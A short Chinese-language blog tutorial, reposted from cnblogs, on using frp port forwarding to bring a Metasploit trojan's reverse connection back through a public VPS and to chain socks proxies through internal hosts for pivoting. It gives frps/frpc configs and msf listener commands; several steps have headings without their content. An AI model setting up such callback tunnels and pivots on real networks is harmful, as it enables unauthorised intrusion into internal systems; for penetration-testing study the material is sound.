原文连接:https://www.cnblogs.com/PANDA-Mosen/p/13096260.html
一、首先在公网上配置服务端(frps.ini)
[common]
bind_addr = xx.xx.xx.xx #公网vps的ip
bind_port = 7000
二、配置客户端frpc. ini
[common]
server_addr = xx.xx.xx.xx #公网vps的ip
server_port = 7000 #这里的端口要跟服务端的一样
[msf]
type = tcp
local_ip = 本机ip
local_port = 5555 #本机要映射出去的端口
remote_port = 6000 #连接服务端的端口
1、单纯内网穿透端口映射上线msf:
生成木马:
配置vps的ip,端口设置为remote_port的值
本地msf开启监听:
set lhost vps的ip
set lport 6000
exploit
2、配合端口映射实现多层socks代理
实验环境:内网C主机不能直接连接vps,可以连接内网B主机,B主机可以直接连接vps,所以通过B作为跳板,将socks代理建设在内网C主机中
具体思路:利用B即作为服务端(frps),也同时作为客户端(frpc),
①内网C主机的frpc.ini设置
启动C主机的客户端程序:
②内网B主机的frps.ini设置:
启动B主机的服务端程序:
思路分析:
两个启动以后,其实已经可以直接通过使用B主机ip+端口直接使用搭建在C主机的socks代理,但是此时是无法直接访问B主机的,但是B主机出网,所以可以通过将刚刚C连接B的1080端口映射到vps上,通过连接vps+端口使用C主机的socks代理
③内网B主机的frpc.ini设置:
启动B主机的客户端程序:
④vps的frps.ini设置:
启动VPS的服务端程序:
此时只需要连接vps的ip+端口即可使用搭建在内网C主机的socks代理
⑤测试socks代理是否搭建成功:
1.使用proxychain启动nc发起一个请求:
2.利用nc监听端口,看到from是内网C主机的ip发起的,证明搭建成功
学海无涯,潜心学习...